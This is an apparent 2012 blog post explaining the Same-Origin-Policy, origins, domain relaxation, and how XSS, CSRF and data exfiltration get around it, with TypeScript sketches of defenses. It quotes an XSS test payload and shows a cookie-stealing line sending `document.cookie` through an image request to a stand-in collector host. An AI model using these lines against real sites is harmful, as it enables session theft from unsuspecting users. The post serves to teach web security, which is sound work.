Every other day the web brings a new JavaScript library, a new framework, a browser hack, or a clever way of using (or bypassing) some feature to build something good. Most of us are so absorbed in learning and building new things that we forget, or never stop to understand, that the core of the web platform is beyond our control. Things are not so bad that anyone can hack your site instantly regardless of your defenses (as a few ‘so-called security experts’ and tech magazines would have it), but there are certainly many loopholes that exist by design, and security ninjas understand them well. As Paul Irish (Google Chrome Developer Evangelist) points out on his blog, academic researchers have in recent years been concentrating on improving the web platform, and browser security is gaining a lot of traction.
The goal of this post is to point out some gray areas in the web platform and to show how browser security is shaping up (some of you may already know bits and pieces of this). It is meant to give web developers a security focus that helps them follow the cutting-edge research going on in this field. As part of my M.S. by Research thesis, I am lucky enough to be surveying and studying the state of the art.
JavaScript and access control
Web developers, especially lovers of JavaScript (JS), know its ‘bad’ parts very well, along with its magical powers. Setting aside the bad parts and the security of the language itself, the other side of JavaScript security is this: what access privileges does a script running in a web page have? The two main security features that limit the damage JS can do in a browser are the Sandbox and the Same-Origin-Policy (SOP).
The sandbox makes sure that JS in the browser has no access to the underlying file system (imagine a malicious script that made its way into your web page deleting your files!). It is because of the sandbox that JavaScript cannot read or write arbitrary files on disk.
Same-Origin-Policy: To understand and define SOP, one first needs to understand the term “Origin”.
Origin: The combination “scheme://host:port” is called the “Origin” of a website. The scheme is the protocol, such as http or https. The host is the domain name, such as example.com. The port is the port number on which the server speaks that protocol. A default port (80 for http, 443 for https) is usually left out of the notation.
By this definition, http://example.com is an origin. Note that http://example.com/profile/kris.php (a dummy link) is a URL whose origin is http://example.com.
For all major security decisions inside the browser, the origin is the basic unit of isolation. Accordingly, JavaScript’s access control (even in HTML5) is defined in terms of access to origins.
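To make the definition concrete, here is a minimal TypeScript sketch that computes the origin of an http or https URL by hand. It assumes a runtime with the WHATWG `URL` class (Node.js or any modern browser); the function name `originOf` is hypothetical, and for these two schemes the built-in `URL.origin` property returns the same string.

```typescript
// Default ports that are omitted when an origin is written out.
const DEFAULT_PORTS: Record<string, string> = { "http:": "80", "https:": "443" };

// Build the "scheme://host:port" origin of a URL, dropping the port when it is
// the scheme's default. Only http and https are handled in this sketch.
function originOf(address: string): string {
  const url = new URL(address);
  if (!(url.protocol in DEFAULT_PORTS)) {
    throw new Error(`unsupported scheme: ${url.protocol}`);
  }
  // URL lower-cases the host and already reports a default port as "".
  const port =
    url.port && url.port !== DEFAULT_PORTS[url.protocol] ? `:${url.port}` : "";
  return `${url.protocol}//${url.hostname}${port}`;
}

console.log(originOf("http://example.com/profile/kris.php")); // http://example.com
console.log(originOf("http://example.com:8080/profile/kris.php")); // http://example.com:8080
```

The path (/profile/kris.php) plays no part in the result, which is why every page under one host, scheme and port shares a single origin.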
Same and cross origin interactions
The Same-Origin-Policy controls the interactions that can happen between origins. Interactions such as reading, writing or executing “resources” are permitted within an origin, whereas they are restricted across origins. The table below shows which URLs count as same origin and which as cross origin.
Note that the sub-domains mail.example.com and chat.example.com are treated as different origins even though they share the same parent domain. This restriction can be lifted with a feature called “domain relaxation”: if pages on both sub-domains set the document.domain property to “example.com”, the origin check compares “example.com” instead. There are many intricacies, of course, which I will not cover here.
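The origin comparison and the domain relaxation described above can be modelled in a few lines. This is a simplified sketch, not how browsers implement it: `isSameOrigin`, `canRelaxTo` and `relaxedSameOrigin` are hypothetical names, the browser's public-suffix check is reduced to rejecting single-label domains, and both pages are assumed to have set `document.domain` to the same value.

```typescript
// Two URLs are same-origin when scheme, host and port all match;
// URL.origin already yields "scheme://host[:port]".
function isSameOrigin(a: string, b: string): boolean {
  return new URL(a).origin === new URL(b).origin;
}

// A page may set document.domain only to its own host or to a parent domain.
// Real browsers also refuse public suffixes such as "com" or "co.uk"; this
// sketch only rejects single-label values as a crude stand-in.
function canRelaxTo(host: string, newDomain: string): boolean {
  const h = host.toLowerCase();
  const d = newDomain.toLowerCase();
  if (!d.includes(".")) return false;
  return h === d || h.endsWith("." + d);
}

// After both pages relax to `domain`, the check compares the scheme and the
// relaxed domain instead of the full host (the port is not compared here).
function relaxedSameOrigin(a: string, b: string, domain: string): boolean {
  const ua = new URL(a);
  const ub = new URL(b);
  return (
    ua.protocol === ub.protocol &&
    canRelaxTo(ua.hostname, domain) &&
    canRelaxTo(ub.hostname, domain)
  );
}

console.log(isSameOrigin("http://mail.example.com/", "http://chat.example.com/")); // false
console.log(relaxedSameOrigin("http://mail.example.com/", "http://chat.example.com/", "example.com")); // true
```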
Note: Michal Zalewski’s book “The Tangled Web” explains the intricacies of origins and browser security in great detail. My understanding of web security multiplied after reading it, and the core concepts in this post are compiled from some of its chapters. I suggest reading it to deepen your knowledge.
Interactions between sites whose origins do not match are called cross-origin interactions, while interactions between sites whose origins match are called same-origin interactions. What is allowed depends on the resource involved. Here, “resources” means the DOM (Document Object Model), cookies, XMLHttpRequest (AJAX), HTML5 localStorage, etc. In general, SOP can be stated as: within an origin, all scripts have equal and complete access to the DOM, storage and network, whereas across origins they do not. In practice, browsers implement the Same-Origin-Policy differently depending on the resource in question.
Now that you understand same-origin and cross-origin interactions, try to answer the questions below yourself. To set the context, let A.com and B.com be websites from two different origins, and let A and B be the content of A.com and B.com respectively, as rendered by the browser. Now:
- Can A get resources (images/css/scripts) from B.com?
- Can A execute resources (scripts) from B.com?
- Can A post content to B.com?
- Can A interfere with the DOM of B?
- Can A redirect a browsing context (iframe, window, etc.) of B?
- Can A read storage (cookies, localStorage, etc.) of B?
- Can chat.A.com communicate (exchange data) with A.com?
- Can A.com/user1 read/fetch content of A.com/user2?
Though these questions look trivial, many concepts lie behind them. I have written several blog posts related to them this year (2012); check these: JSONP and Cross-Origin AJAX, AJAX vs. HTML5 CORS, HTML5 Sandbox, The need for HTML5 PostMessage, and Frame Navigation Policies.
Why is the web “Uncontrollable”?
Though the Same-Origin-Policy restricts the way scripts interact, it has several bypasses and cannot meet complex security requirements (mashups are the best example). Below are some cases that are beyond the control of SOP.
Content Inclusion:
All HTML elements that make HTTP GET requests can load content from any origin, for example <img src="">, <link href=""> and <script src="">. SOP places no restriction on such cross-origin inclusion. This has been a security concern for several years, because browsers do nothing to check the inflow of content. Also, nothing stops an image tag from downloading a script. As JavaScript guru Douglas Crockford rightly points out, “SOP does not apply to scripts themselves”.
Moreover, scripts involve a kind of recursion: a script can itself create another script tag in the DOM and load a remote script. So even if a script “X” is trustworthy, that does not imply that the scripts “Y” and “Z” loaded by “X” are trustworthy. Trust is not transitive, and it cannot be verified in this model.
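The recursion problem can be pictured as a graph. In this toy model (all names and URLs are hypothetical), each script maps to the scripts it injects at runtime, and the code running with the page's privileges is everything reachable from the directly included scripts, not only the scripts the developer actually vetted.

```typescript
// Hypothetical model: each script URL maps to the script URLs it injects.
type LoadGraph = Map<string, string[]>;

// Every script that ends up running when the page includes `roots`,
// following injected <script> tags transitively (breadth-first).
function runningScripts(roots: string[], graph: LoadGraph): Set<string> {
  const seen = new Set<string>();
  const queue = [...roots];
  while (queue.length > 0) {
    const url = queue.shift()!;
    if (seen.has(url)) continue; // guard against load cycles
    seen.add(url);
    for (const child of graph.get(url) ?? []) queue.push(child);
  }
  return seen;
}

// Scripts that run with the page's full privileges although nobody vetted them.
function unvetted(roots: string[], graph: LoadGraph, vetted: Set<string>): string[] {
  return Array.from(runningScripts(roots, graph)).filter((url) => !vetted.has(url));
}

const graph: LoadGraph = new Map([
  ["https://cdn.example/x.js", ["https://ads.example/y.js"]],
  ["https://ads.example/y.js", ["https://tracker.example/z.js"]],
]);
const vetted = new Set(["https://cdn.example/x.js"]);
console.log(JSON.stringify(unvetted(["https://cdn.example/x.js"], graph, vetted)));
// ["https://ads.example/y.js","https://tracker.example/z.js"]
```

Vetting “X” says nothing about “Y” and “Z”, and the browser has no way to ask whether they were ever reviewed.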
Cross-Site Scripting (XSS):
As most of us know, XSS is a technique in which attackers exploit flaws in web applications to inject malicious code. Code injection typically happens because inputs are not sanitized, or are sanitized weakly, either before being stored in the database or before being rendered into the DOM. Based on how it is triggered, XSS is classified as Stored, Reflected or DOM-based XSS. OWASP.org has detailed information on XSS along with several detection and prevention techniques.
The point is that once a script is injected, it has the same complete privileges as the genuine scripts in that origin, so DOM, network and storage access are all compromised. SOP has nothing to say about XSS, which is a major problem.
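Since weak sanitization is the usual root cause, here is a minimal sketch of one common defense: HTML-escaping untrusted text before it is inserted into a page. The `escapeHtml` helper is hypothetical, and it is only safe for HTML element content and quoted attribute values; other contexts (URLs, inline scripts, CSS) need different encoding, which OWASP's guidance covers.

```typescript
// Escape the characters that are significant in HTML text and quoted
// attribute values. "&" must go first so later entities are not re-escaped.
function escapeHtml(untrusted: string): string {
  return untrusted
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const comment = `<img src=x onerror="alert(document.cookie)">`;
console.log(escapeHtml(comment));
// &lt;img src=x onerror=&quot;alert(document.cookie)&quot;&gt;
```

In the browser, assigning untrusted text to `textContent` instead of `innerHTML` avoids HTML parsing altogether. Either way, escaping only prevents the injection; once a script does get in, SOP gives it full privileges.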
Cross-Site Request Forgery (CSRF):
In this well-known attack, the attacker's page makes the victim's browser send HTTP requests to a site where the victim is logged in, so the attacker masquerades as the genuine user. Because the browser attaches the user's cookies, the server assumes the request comes from the genuine user and executes it. A simple image tag is enough to send a cross-origin GET request that impersonates the genuine user (see OWASP.org for more information). SOP places no restrictions on outgoing requests and has no mechanism to tell genuine requests from malicious ones, so it fails to prevent CSRF.
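Since SOP cannot tell a genuine request from a forged one, applications usually add that check themselves. One common server-side approach, a synchronizer token (not something this post describes), is sketched below for Node.js; the in-memory `csrfTokens` map and the `issueToken`/`isGenuine` helpers are hypothetical. It works precisely because SOP stops the attacker's page from reading the victim's form, so the attacker never learns the token.

```typescript
import { randomBytes, timingSafeEqual } from "node:crypto";

// Hypothetical in-memory session store: session id -> CSRF token.
const csrfTokens = new Map<string, string>();

// Issue a random token when rendering a form for this session; the server
// embeds it in a hidden form field.
function issueToken(sessionId: string): string {
  const token = randomBytes(32).toString("hex");
  csrfTokens.set(sessionId, token);
  return token;
}

// Accept a state-changing request only if it echoes the session's token.
// Cookies alone prove nothing: the browser attaches them to forged requests too.
function isGenuine(sessionId: string, submitted: string | undefined): boolean {
  const expected = csrfTokens.get(sessionId);
  if (expected === undefined || submitted === undefined) return false;
  const a = Buffer.from(expected);
  const b = Buffer.from(submitted);
  // timingSafeEqual throws on unequal lengths, so compare lengths first.
  return a.length === b.length && timingSafeEqual(a, b);
}

const token = issueToken("session-123");
console.log(isGenuine("session-123", token)); // true
console.log(isGenuine("session-123", undefined)); // false, e.g. a request fired by an <img> tag
```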
Data Exfiltration:
Data can be sent to other origins using several techniques. Besides image, script and link tags, which make cross-origin GET requests, HTML forms can make cross-origin POSTs, so sensitive data can be exported to malicious destinations. Several other hacks can also export data (they are out of the scope of this post); the main problem is the lack of any check on outgoing data. SOP has no mechanism to detect data exfiltration, which is another major concern.
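To see why checking outgoing data is hard, note that the data leaves the page as nothing more than part of a URL. The sketch below, in which the collector address and `exfiltrationUrl` are hypothetical, builds the kind of image URL an injected script could request; to the browser it is an ordinary cross-origin GET.

```typescript
// Hypothetical collector endpoint; any origin the attacker controls would do.
const COLLECTOR = "https://collector.example/pixel.gif";

// Smuggle arbitrary data into the query string of an image request.
function exfiltrationUrl(stolen: string): string {
  const url = new URL(COLLECTOR);
  url.searchParams.set("d", stolen); // percent-encodes the payload
  return url.toString();
}

// In a browser, an injected script would only need:
//   new Image().src = exfiltrationUrl(document.cookie);
console.log(exfiltrationUrl("session=abc123"));
// https://collector.example/pixel.gif?d=session%3Dabc123
```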
Conclusion
In principle, data can be pulled in and sent out through several channels without any security checks by the browser (authentication and authorization belong to application logic on the server, not the client). Because of these factors, the current web is uncontrollable. To fix these problems, security researchers are designing stricter browser security policies that address the limitations of SOP. The main challenge is that the web has already grown into a huge tree, and any drastic change would break it. Backward compatibility, whether with older browsers, older languages or developers who are not ready to migrate, is part of this grand challenge. Still, the work of several smart researchers is beginning to pay off, with smarter and stricter policies coming into the picture. I will discuss them in upcoming posts. Stay tuned!
Tags: web security, JavaScript, HTML5, browsers